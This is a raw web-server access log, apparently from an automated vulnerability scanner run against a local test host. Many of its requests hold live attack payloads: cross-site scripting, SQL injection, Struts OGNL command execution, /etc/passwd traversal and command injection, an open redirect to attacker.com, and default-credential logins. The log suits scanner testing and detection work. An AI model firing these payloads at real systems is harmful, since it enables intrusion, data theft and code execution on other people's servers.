"18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=\x5C\x5C\x5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminer/adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/29KD20V4lxqSCNwp6ZUDyjurh11/)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login?!'>/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 